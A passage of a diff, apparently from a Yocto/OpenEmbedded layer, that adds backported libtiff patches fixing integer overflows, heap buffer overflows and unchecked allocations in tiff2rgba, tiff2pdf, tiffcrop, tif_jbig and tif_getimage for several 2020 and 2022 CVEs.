115 TIFFError(TIFFFileName(in), "Integer overflow when calculating wrk_line buffer");
116- exit(-1);
117+ exit(EXIT_FAILURE);
118 }
119 wrk_line = (uint32*)_TIFFmalloc(wrk_linesize);
120 if (!wrk_line) {
121@@ -528,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
122 return( cvt_whole_image( in, out ) );
123 }
124
125-static char* stuff[] = {
126+const static char* stuff[] = {
127 "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
128 "where comp is one of the following compression algorithms:",
129 " jpeg\t\tJPEG encoding",
130@@ -547,13 +557,12 @@ static char* stuff[] = {
131 static void
132 usage(int code)
133 {
134- char buf[BUFSIZ];
135 int i;
136+ FILE * out = (code == EXIT_SUCCESS) ? stdout : stderr;
137
138- setbuf(stderr, buf);
139- fprintf(stderr, "%s\n\n", TIFFGetVersion());
140+ fprintf(out, "%s\n\n", TIFFGetVersion());
141 for (i = 0; stuff[i] != NULL; i++)
142- fprintf(stderr, "%s\n", stuff[i]);
143+ fprintf(out, "%s\n", stuff[i]);
144 exit(code);
145 }
146
147--
148GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..b6e1842a54
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,27 @@
1From ca70b5e702b9f503333344b2d46691de9feae84e Mon Sep 17 00:00:00 2001
2From: Even Rouault <even.rouault@spatialys.com>
3Date: Sat, 3 Oct 2020 18:16:27 +0200
4Subject: [PATCH] tiff2rgba.c: fix -Wold-style-declaration warning
5
6Signed-off-by: akash hadke <akash.hadke@kpit.com>
7---
8 tools/tiff2rgba.c | 2 +-
9 1 file changed, 1 insertion(+), 1 deletion(-)
10---
11Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/ca70b5e702b9f503333344b2d46691de9feae84e.patch]
12---
13diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
14index ef643653..fbc383aa 100644
15--- a/tools/tiff2rgba.c
16+++ b/tools/tiff2rgba.c
17@@ -538,7 +538,7 @@ tiffcvt(TIFF* in, TIFF* out)
18 return( cvt_whole_image( in, out ) );
19 }
20
21-const static char* stuff[] = {
22+static const char* stuff[] = {
23 "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
24 "where comp is one of the following compression algorithms:",
25 " jpeg\t\tJPEG encoding",
26--
27GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
new file mode 100644
index 0000000000..129721ff3e
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35521_and_CVE-2020-35522.patch
@@ -0,0 +1,119 @@
1From 98a254f5b92cea22f5436555ff7fceb12afee84d Mon Sep 17 00:00:00 2001
2From: Thomas Bernard <miniupnp@free.fr>
3Date: Sun, 15 Nov 2020 17:02:51 +0100
4Subject: [PATCH 1/2] enforce (configurable) memory limit in tiff2rgba
5
6fixes #207
7fixes #209
8
9Signed-off-by: akash hadke <akash.hadke@kpit.com>
10---
11 tools/tiff2rgba.c | 25 +++++++++++++++++++++++--
12 1 file changed, 23 insertions(+), 2 deletions(-)
13---
14CVE: CVE-2020-35521
15CVE: CVE-2020-35522
16Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5a935d96b21cda0f434230cdf8ca958cd8b4eef.patch]
17---
18diff --git a/tools/tiff2rgba.c b/tools/tiff2rgba.c
19index fbc383aa..764395f6 100644
20--- a/tools/tiff2rgba.c
21+++ b/tools/tiff2rgba.c
22@@ -60,6 +60,10 @@ uint32 rowsperstrip = (uint32) -1;
23 int process_by_block = 0; /* default is whole image at once */
24 int no_alpha = 0;
25 int bigtiff_output = 0;
26+#define DEFAULT_MAX_MALLOC (256 * 1024 * 1024)
27+/* malloc size limit (in bytes)
28+ * disabled when set to 0 */
29+static tmsize_t maxMalloc = DEFAULT_MAX_MALLOC;
30
31
32 static int tiffcvt(TIFF* in, TIFF* out);
33@@ -75,8 +79,11 @@ main(int argc, char* argv[])
34 extern char *optarg;
35 #endif
36
37- while ((c = getopt(argc, argv, "c:r:t:bn8h")) != -1)
38+ while ((c = getopt(argc, argv, "c:r:t:bn8hM:")) != -1)
39 switch (c) {
40+ case 'M':
41+ maxMalloc = (tmsize_t)strtoul(optarg, NULL, 0) << 20;
42+ break;
43 case 'b':
44 process_by_block = 1;
45 break;
46@@ -405,6 +412,12 @@ cvt_whole_image( TIFF *in, TIFF *out )
47 (unsigned long)width, (unsigned long)height);
48 return 0;
49 }
50+ if (maxMalloc != 0 && (tmsize_t)pixel_count * (tmsize_t)sizeof(uint32) > maxMalloc) {
51+ TIFFError(TIFFFileName(in),
52+ "Raster size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT "), try -b option.",
53+ (uint64)pixel_count * sizeof(uint32), (uint64)maxMalloc);
54+ return 0;
55+ }
56
57 rowsperstrip = TIFFDefaultStripSize(out, rowsperstrip);
58 TIFFSetField(out, TIFFTAG_ROWSPERSTRIP, rowsperstrip);
59@@ -530,6 +543,13 @@ tiffcvt(TIFF* in, TIFF* out)
60 TIFFSetField(out, TIFFTAG_SOFTWARE, TIFFGetVersion());
61 CopyField(TIFFTAG_DOCUMENTNAME, stringv);
62
63+ if (maxMalloc != 0 && TIFFStripSize(in) > maxMalloc)
64+ {
65+ TIFFError(TIFFFileName(in),
66+ "Strip Size " TIFF_UINT64_FORMAT " over memory limit (" TIFF_UINT64_FORMAT ")",
67+ (uint64)TIFFStripSize(in), (uint64)maxMalloc);
68+ return 0;
69+ }
70 if( process_by_block && TIFFIsTiled( in ) )
71 return( cvt_by_tile( in, out ) );
72 else if( process_by_block )
73@@ -539,7 +559,7 @@ tiffcvt(TIFF* in, TIFF* out)
74 }
75
76 static const char* stuff[] = {
77- "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] input... output",
78+ "usage: tiff2rgba [-c comp] [-r rows] [-b] [-n] [-8] [-M size] input... output",
79 "where comp is one of the following compression algorithms:",
80 " jpeg\t\tJPEG encoding",
81 " zip\t\tZip/Deflate encoding",
82@@ -551,6 +571,7 @@ static const char* stuff[] = {
83 " -b (progress by block rather than as a whole image)",
84 " -n don't emit alpha component.",
85 " -8 write BigTIFF file instead of ClassicTIFF",
86+ " -M set the memory allocation limit in MiB. 0 to disable limit",
87 NULL
88 };
89
90--
91GitLab
92
93
94From e9e504193ef1f87e9cb5e986586b0cbe3254e421 Mon Sep 17 00:00:00 2001
95From: Thomas Bernard <miniupnp@free.fr>
96Date: Sun, 15 Nov 2020 17:08:42 +0100
97Subject: [PATCH 2/2] tiff2rgba.1: -M option
98
99---
100 man/tiff2rgba.1 | 4 ++++
101 1 file changed, 4 insertions(+)
102
103diff --git a/man/tiff2rgba.1 b/man/tiff2rgba.1
104index d9c9baae..fe9ebb2c 100644
105--- a/man/tiff2rgba.1
106+++ b/man/tiff2rgba.1
107@@ -87,6 +87,10 @@ Drop the alpha component from the output file, producing a pure RGB file.
108 Currently this does not work if the
109 .B \-b
110 flag is also in effect.
111+.TP
112+.BI \-M " size"
113+Set maximum memory allocation size (in MiB). The default is 256MiB.
114+Set to 0 to disable the limit.
115 .SH "SEE ALSO"
116 .BR tiff2bw (1),
117 .BR TIFFReadRGBAImage (3t),
118--
119GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
new file mode 100644
index 0000000000..1f30b32799
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35523.patch
@@ -0,0 +1,55 @@
1From c8d613ef497058fe653c467fc84c70a62a4a71b2 Mon Sep 17 00:00:00 2001
2From: Thomas Bernard <miniupnp@free.fr>
3Date: Tue, 10 Nov 2020 01:54:30 +0100
4Subject: [PATCH] gtTileContig(): check Tile width for overflow
5
6fixes #211
7
8Upstream-Status: Backport [ https://gitlab.com/libtiff/libtiff/-/commit/c8d613ef497058fe653c467fc84c70a62a4a71b2 ]
9CVE: CVE-2020-35523
10Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
11---
12 libtiff/tif_getimage.c | 17 +++++++++++++----
13 1 file changed, 13 insertions(+), 4 deletions(-)
14
15diff --git a/libtiff/tif_getimage.c b/libtiff/tif_getimage.c
16index 4da785d3..96ab1460 100644
17--- a/libtiff/tif_getimage.c
18+++ b/libtiff/tif_getimage.c
19@@ -29,6 +29,7 @@
20 */
21 #include "tiffiop.h"
22 #include <stdio.h>
23+#include <limits.h>
24
25 static int gtTileContig(TIFFRGBAImage*, uint32*, uint32, uint32);
26 static int gtTileSeparate(TIFFRGBAImage*, uint32*, uint32, uint32);
27@@ -645,12 +646,20 @@ gtTileContig(TIFFRGBAImage* img, uint32* raster, uint32 w, uint32 h)
28
29 flip = setorientation(img);
30 if (flip & FLIP_VERTICALLY) {
31- y = h - 1;
32- toskew = -(int32)(tw + w);
33+ if ((tw + w) > INT_MAX) {
34+ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
35+ return (0);
36+ }
37+ y = h - 1;
38+ toskew = -(int32)(tw + w);
39 }
40 else {
41- y = 0;
42- toskew = -(int32)(tw - w);
43+ if (tw > (INT_MAX + w)) {
44+ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif), "%s", "unsupported tile size (too wide)");
45+ return (0);
46+ }
47+ y = 0;
48+ toskew = -(int32)(tw - w);
49 }
50
51 /*
52--
53GitLab
54
55
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
new file mode 100644
index 0000000000..5232eacb50
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-1.patch
@@ -0,0 +1,42 @@
1From c6a12721b46f1a72974f91177890301730d7b330 Mon Sep 17 00:00:00 2001
2From: Thomas Bernard <miniupnp@free.fr>
3Date: Tue, 10 Nov 2020 01:01:59 +0100
4Subject: [PATCH] tiff2pdf.c: properly calculate datasize when saving to JPEG
5 YCbCr
6
7fixes #220
8Upstream-Status: Backport
9https://gitlab.com/libtiff/libtiff/-/commit/c6a12721b46f1a72974f91177890301730d7b330
10https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
11CVE: CVE-2021-35524
12Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
13
14---
15 tools/tiff2pdf.c | 11 ++++++++---
16 1 file changed, 8 insertions(+), 3 deletions(-)
17
18diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
19index 719811ea..dc69d2f9 100644
20--- a/tools/tiff2pdf.c
21+++ b/tools/tiff2pdf.c
22@@ -2087,9 +2087,14 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
23 #endif
24 (void) 0;
25 }
26- k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
27- if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
28- k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
29+ if(t2p->pdf_compression == T2P_COMPRESS_JPEG
30+ && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
31+ k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
32+ } else {
33+ k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
34+ if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
35+ k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
36+ }
37 }
38 if (k == 0) {
39 /* Assume we had overflow inside TIFFScanlineSize */
40--
41GitLab
42
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
new file mode 100644
index 0000000000..406d467766
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2020-35524-2.patch
@@ -0,0 +1,36 @@
1From d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2 Mon Sep 17 00:00:00 2001
2From: Thomas Bernard <miniupnp@free.fr>
3Date: Tue, 10 Nov 2020 02:05:05 +0100
4Subject: [PATCH] Fix for building without JPEG support
5
6Upstream-Status: Backport
7https://gitlab.com/libtiff/libtiff/-/commit/d74f56e3b7ea55c8a18a03bc247cd5fd0ca288b2
8https://gitlab.com/libtiff/libtiff/-/merge_requests/159/commits
9CVE: CVE-2021-35524
10Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
11---
12 tools/tiff2pdf.c | 5 ++++-
13 1 file changed, 4 insertions(+), 1 deletion(-)
14
15diff --git a/tools/tiff2pdf.c b/tools/tiff2pdf.c
16index dc69d2f9..d0b0ede7 100644
17--- a/tools/tiff2pdf.c
18+++ b/tools/tiff2pdf.c
19@@ -2087,10 +2087,13 @@ void t2p_read_tiff_size(T2P* t2p, TIFF* input){
20 #endif
21 (void) 0;
22 }
23+#ifdef JPEG_SUPPORT
24 if(t2p->pdf_compression == T2P_COMPRESS_JPEG
25 && t2p->tiff_photometric == PHOTOMETRIC_YCBCR) {
26 k = checkMultiply64(TIFFNumberOfStrips(input), TIFFStripSize(input), t2p);
27- } else {
28+ } else
29+#endif
30+ {
31 k = checkMultiply64(TIFFScanlineSize(input), t2p->tiff_length, t2p);
32 if(t2p->tiff_planar==PLANARCONFIG_SEPARATE){
33 k = checkMultiply64(k, t2p->tiff_samplesperpixel, t2p);
34--
35GitLab
36
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
new file mode 100644
index 0000000000..e2d136f587
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0865.patch
@@ -0,0 +1,39 @@
1From a1c933dabd0e1c54a412f3f84ae0aa58115c6067 Mon Sep 17 00:00:00 2001
2From: Even Rouault <even.rouault@spatialys.com>
3Date: Thu, 24 Feb 2022 22:26:02 +0100
4Subject: [PATCH] tif_jbig.c: fix crash when reading a file with multiple IFD
5 in memory-mapped mode and when bit reversal is needed (fixes #385)
6
7CVE: CVE-2022-0865
8Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0865.patch/]
9Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
10Comment: No change in any hunk
11
12---
13 libtiff/tif_jbig.c | 10 ++++++++++
14 1 file changed, 10 insertions(+)
15
16diff --git a/libtiff/tif_jbig.c b/libtiff/tif_jbig.c
17index 74086338..8bfa4cef 100644
18--- a/libtiff/tif_jbig.c
19+++ b/libtiff/tif_jbig.c
20@@ -208,6 +208,16 @@ int TIFFInitJBIG(TIFF* tif, int scheme)
21 */
22 tif->tif_flags |= TIFF_NOBITREV;
23 tif->tif_flags &= ~TIFF_MAPPED;
24+ /* We may have read from a previous IFD and thus set TIFF_BUFFERMMAP and
25+ * cleared TIFF_MYBUFFER. It is necessary to restore them to their initial
26+ * value to be consistent with the state of a non-memory mapped file.
27+ */
28+ if (tif->tif_flags&TIFF_BUFFERMMAP) {
29+ tif->tif_rawdata = NULL;
30+ tif->tif_rawdatasize = 0;
31+ tif->tif_flags &= ~TIFF_BUFFERMMAP;
32+ tif->tif_flags |= TIFF_MYBUFFER;
33+ }
34
35 /* Setup the function pointers for encode, decode, and cleanup. */
36 tif->tif_setupdecode = JBIGSetupDecode;
37--
38GitLab
39
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
new file mode 100644
index 0000000000..e2f1bd3056
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0891.patch
@@ -0,0 +1,217 @@
1From 232282fd8f9c21eefe8d2d2b96cdbbb172fe7b7c Mon Sep 17 00:00:00 2001
2From: Su Laus <sulau@freenet.de>
3Date: Tue, 8 Mar 2022 17:02:44 +0000
4Subject: [PATCH] tiffcrop: fix issue #380 and #382 heap buffer overflow in
5 extractImageSection
6
7CVE: CVE-2022-0891
8Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0891.patch/]
9Comment: No change in any hunk
10Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
11---
12 tools/tiffcrop.c | 92 +++++++++++++++++++-----------------------------
13 1 file changed, 36 insertions(+), 56 deletions(-)
14
15diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
16index f2e5474a..e62bcc71 100644
17--- a/tools/tiffcrop.c
18+++ b/tools/tiffcrop.c
19@@ -105,8 +105,8 @@
20 * of messages to monitor progess without enabling dump logs.
21 */
22
23-static char tiffcrop_version_id[] = "2.4";
24-static char tiffcrop_rev_date[] = "12-13-2010";
25+static char tiffcrop_version_id[] = "2.4.1";
26+static char tiffcrop_rev_date[] = "03-03-2010";
27
28 #include "tif_config.h"
29 #include "tiffiop.h"
30@@ -6670,10 +6670,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
31 #ifdef DEVELMODE
32 uint32 img_length;
33 #endif
34- uint32 j, shift1, shift2, trailing_bits;
35+ uint32 j, shift1, trailing_bits;
36 uint32 row, first_row, last_row, first_col, last_col;
37 uint32 src_offset, dst_offset, row_offset, col_offset;
38- uint32 offset1, offset2, full_bytes;
39+ uint32 offset1, full_bytes;
40 uint32 sect_width;
41 #ifdef DEVELMODE
42 uint32 sect_length;
43@@ -6683,7 +6683,6 @@ extractImageSection(struct image_data *image, struct pageseg *section,
44 #ifdef DEVELMODE
45 int k;
46 unsigned char bitset;
47- static char *bitarray = NULL;
48 #endif
49
50 img_width = image->width;
51@@ -6701,17 +6700,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
52 dst_offset = 0;
53
54 #ifdef DEVELMODE
55- if (bitarray == NULL)
56- {
57- if ((bitarray = (char *)malloc(img_width)) == NULL)
58- {
59- TIFFError ("", "DEBUG: Unable to allocate debugging bitarray");
60- return (-1);
61- }
62- }
63+ char bitarray[39];
64 #endif
65
66- /* rows, columns, width, length are expressed in pixels */
67+ /* rows, columns, width, length are expressed in pixels
68+ * first_row, last_row, .. are index into image array starting at 0 to width-1,
69+ * last_col shall be also extracted. */
70 first_row = section->y1;
71 last_row = section->y2;
72 first_col = section->x1;
73@@ -6721,9 +6715,14 @@ extractImageSection(struct image_data *image, struct pageseg *section,
74 #ifdef DEVELMODE
75 sect_length = last_row - first_row + 1;
76 #endif
77- img_rowsize = ((img_width * bps + 7) / 8) * spp;
78- full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
79- trailing_bits = (sect_width * bps) % 8;
80+ /* The read function loadImage() used copy separate plane data into a buffer as interleaved
81+ * samples rather than separate planes so the same logic works to extract regions
82+ * regardless of the way the data are organized in the input file.
83+ * Furthermore, bytes and bits are arranged in buffer according to COMPRESSION=1 and FILLORDER=1
84+ */
85+ img_rowsize = (((img_width * spp * bps) + 7) / 8); /* row size in full bytes of source image */
86+ full_bytes = (sect_width * spp * bps) / 8; /* number of COMPLETE bytes per row in section */
87+ trailing_bits = (sect_width * spp * bps) % 8; /* trailing bits within the last byte of destination buffer */
88
89 #ifdef DEVELMODE
90 TIFFError ("", "First row: %d, last row: %d, First col: %d, last col: %d\n",
91@@ -6736,10 +6735,9 @@ extractImageSection(struct image_data *image, struct pageseg *section,
92
93 if ((bps % 8) == 0)
94 {
95- col_offset = first_col * spp * bps / 8;
96+ col_offset = (first_col * spp * bps) / 8;
97 for (row = first_row; row <= last_row; row++)
98 {
99- /* row_offset = row * img_width * spp * bps / 8; */
100 row_offset = row * img_rowsize;
101 src_offset = row_offset + col_offset;
102
103@@ -6752,14 +6750,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
104 }
105 else
106 { /* bps != 8 */
107- shift1 = spp * ((first_col * bps) % 8);
108- shift2 = spp * ((last_col * bps) % 8);
109+ shift1 = ((first_col * spp * bps) % 8); /* shift1 = bits to skip in the first byte of source buffer*/
110 for (row = first_row; row <= last_row; row++)
111 {
112 /* pull out the first byte */
113 row_offset = row * img_rowsize;
114- offset1 = row_offset + (first_col * bps / 8);
115- offset2 = row_offset + (last_col * bps / 8);
116+ offset1 = row_offset + ((first_col * spp * bps) / 8); /* offset1 = offset into source of byte with first bits to be extracted */
117
118 #ifdef DEVELMODE
119 for (j = 0, k = 7; j < 8; j++, k--)
120@@ -6771,12 +6767,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
121 sprintf(&bitarray[9], " ");
122 for (j = 10, k = 7; j < 18; j++, k--)
123 {
124- bitset = *(src_buff + offset2) & (((unsigned char)1 << k)) ? 1 : 0;
125+ bitset = *(src_buff + offset1 + full_bytes) & (((unsigned char)1 << k)) ? 1 : 0;
126 sprintf(&bitarray[j], (bitset) ? "1" : "0");
127 }
128 bitarray[18] = '\0';
129- TIFFError ("", "Row: %3d Offset1: %d, Shift1: %d, Offset2: %d, Shift2: %d\n",
130- row, offset1, shift1, offset2, shift2);
131+ TIFFError ("", "Row: %3d Offset1: %"PRIu32", Shift1: %"PRIu32", Offset2: %"PRIu32", Trailing_bits: %"PRIu32"\n",
132+ row, offset1, shift1, offset1+full_bytes, trailing_bits);
133 #endif
134
135 bytebuff1 = bytebuff2 = 0;
136@@ -6800,11 +6796,12 @@ extractImageSection(struct image_data *image, struct pageseg *section,
137
138 if (trailing_bits != 0)
139 {
140- bytebuff2 = src_buff[offset2] & ((unsigned char)255 << (7 - shift2));
141+ /* Only copy higher bits of samples and mask lower bits of not wanted column samples to zero */
142+ bytebuff2 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (8 - trailing_bits));
143 sect_buff[dst_offset] = bytebuff2;
144 #ifdef DEVELMODE
145 TIFFError ("", " Trailing bits src offset: %8d, Dst offset: %8d\n",
146- offset2, dst_offset);
147+ offset1 + full_bytes, dst_offset);
148 for (j = 30, k = 7; j < 38; j++, k--)
149 {
150 bitset = *(sect_buff + dst_offset) & (((unsigned char)1 << k)) ? 1 : 0;
151@@ -6823,8 +6820,10 @@ extractImageSection(struct image_data *image, struct pageseg *section,
152 #endif
153 for (j = 0; j <= full_bytes; j++)
154 {
155- bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
156- bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (7 - shift1));
157+ /* Skip the first shift1 bits and shift the source up by shift1 bits before save to destination.*/
158+ /* Attention: src_buff size needs to be some bytes larger than image size, because could read behind image here. */
159+ bytebuff1 = src_buff[offset1 + j] & ((unsigned char)255 >> shift1);
160+ bytebuff2 = src_buff[offset1 + j + 1] & ((unsigned char)255 << (8 - shift1));
161 sect_buff[dst_offset + j] = (bytebuff1 << shift1) | (bytebuff2 >> (8 - shift1));
162 }
163 #ifdef DEVELMODE
164@@ -6840,36 +6839,17 @@ extractImageSection(struct image_data *image, struct pageseg *section,
165 #endif
166 dst_offset += full_bytes;
167
168+ /* Copy the trailing_bits for the last byte in the destination buffer.
169+ Could come from one ore two bytes of the source buffer. */
170 if (trailing_bits != 0)
171 {
172 #ifdef DEVELMODE
173- TIFFError ("", " Trailing bits src offset: %8d, Dst offset: %8d\n", offset1 + full_bytes, dst_offset);
174-#endif
175- if (shift2 > shift1)
176- {
177- bytebuff1 = src_buff[offset1 + full_bytes] & ((unsigned char)255 << (7 - shift2));
178- bytebuff2 = bytebuff1 & ((unsigned char)255 << shift1);
179- sect_buff[dst_offset] = bytebuff2;
180-#ifdef DEVELMODE
181- TIFFError ("", " Shift2 > Shift1\n");
182+ TIFFError("", " Trailing bits %4"PRIu32" src offset: %8"PRIu32", Dst offset: %8"PRIu32"\n", trailing_bits, offset1 + full_bytes, dst_offset);
183 #endif
184+ /* More than necessary bits are already copied into last destination buffer,
185+ * only masking of last byte in destination buffer is necessary.*/
186+ sect_buff[dst_offset] &= ((uint8_t)0xFF << (8 - trailing_bits));
187 }
188- else
189- {
190- if (shift2 < shift1)
191- {
192- bytebuff2 = ((unsigned char)255 << (shift1 - shift2 - 1));
193- sect_buff[dst_offset] &= bytebuff2;
194-#ifdef DEVELMODE
195- TIFFError ("", " Shift2 < Shift1\n");
196-#endif
197- }
198-#ifdef DEVELMODE
199- else
200- TIFFError ("", " Shift2 == Shift1\n");
201-#endif
202- }
203- }
204 #ifdef DEVELMODE
205 sprintf(&bitarray[28], " ");
206 sprintf(&bitarray[29], " ");
207@@ -7022,7 +7002,7 @@ writeImageSections(TIFF *in, TIFF *out, struct image_data *image,
208 width = sections[i].x2 - sections[i].x1 + 1;
209 length = sections[i].y2 - sections[i].y1 + 1;
210 sectsize = (uint32)
211- ceil((width * image->bps + 7) / (double)8) * image->spp * length;
212+ ceil((width * image->bps * image->spp + 7) / (double)8) * length;
213 /* allocate a buffer if we don't have one already */
214 if (createImageSection(sectsize, sect_buff_ptr))
215 {
216--
217GitLab
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
new file mode 100644
index 0000000000..da3ead5481
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0907.patch
@@ -0,0 +1,94 @@
1From 40b00cfb32256d377608b4d4cd30fac338d0a0bc Mon Sep 17 00:00:00 2001
2From: Augustus <wangdw.augustus@qq.com>
3Date: Mon, 7 Mar 2022 18:21:49 +0800
4Subject: [PATCH] add checks for return value of limitMalloc (#392)
5
6CVE: CVE-2022-0907
7Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0907.patch/]
8Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
9Comment: No change in any hunk
10
11---
12 tools/tiffcrop.c | 33 +++++++++++++++++++++------------
13 1 file changed, 21 insertions(+), 12 deletions(-)
14
15diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
16index f2e5474a..9b8acc7e 100644
17--- a/tools/tiffcrop.c
18+++ b/tools/tiffcrop.c
19@@ -7337,7 +7337,11 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
20 if (!sect_buff)
21 {
22 sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
23- *sect_buff_ptr = sect_buff;
24+ if (!sect_buff)
25+ {
26+ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
27+ return (-1);
28+ }
29 _TIFFmemset(sect_buff, 0, sectsize);
30 }
31 else
32@@ -7353,15 +7357,15 @@ createImageSection(uint32_t sectsize, unsigned char **sect_buff_ptr)
33 else
34 sect_buff = new_buff;
35
36+ if (!sect_buff)
37+ {
38+ TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
39+ return (-1);
40+ }
41 _TIFFmemset(sect_buff, 0, sectsize);
42 }
43 }
44
45- if (!sect_buff)
46- {
47- TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
48- return (-1);
49- }
50 prev_sectsize = sectsize;
51 *sect_buff_ptr = sect_buff;
52
53@@ -7628,7 +7632,11 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
54 if (!crop_buff)
55 {
56 crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
57- *crop_buff_ptr = crop_buff;
58+ if (!crop_buff)
59+ {
60+ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
61+ return (-1);
62+ }
63 _TIFFmemset(crop_buff, 0, cropsize);
64 prev_cropsize = cropsize;
65 }
66@@ -7644,15 +7652,15 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
67 }
68 else
69 crop_buff = new_buff;
70+ if (!crop_buff)
71+ {
72+ TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
73+ return (-1);
74+ }
75 _TIFFmemset(crop_buff, 0, cropsize);
76 }
77 }
78
79- if (!crop_buff)
80- {
81- TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
82- return (-1);
83- }
84 *crop_buff_ptr = crop_buff;
85
86 if (crop->crop_mode & CROP_INVERT)
87@@ -9211,3 +9219,4 @@ invertImage(uint16_t photometric, uint16_t spp, uint16_t bps, uint32_t width, ui
88 * fill-column: 78
89 * End:
90 */
91+
92--
93GitLab
94
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
new file mode 100644
index 0000000000..e65af6c600
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-0908.patch
@@ -0,0 +1,34 @@
1From a95b799f65064e4ba2e2dfc206808f86faf93e85 Mon Sep 17 00:00:00 2001
2From: Even Rouault <even.rouault@spatialys.com>
3Date: Thu, 17 Feb 2022 15:28:43 +0100
4Subject: [PATCH] TIFFFetchNormalTag(): avoid calling memcpy() with a null
5 source pointer and size of zero (fixes #383)
6
7CVE: CVE-2022-0908
8Upstream-Status: Backport [https://sources.debian.org/src/tiff/4.1.0+git191117-2%7Edeb10u4/debian/patches/CVE-2022-0908.patch/]
9Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
10Comment: No change in any hunk
11
12---
13 libtiff/tif_dirread.c | 5 ++++-
14 1 file changed, 4 insertions(+), 1 deletion(-)
15
16diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
17index 50ebf8ac..2ec44a4f 100644
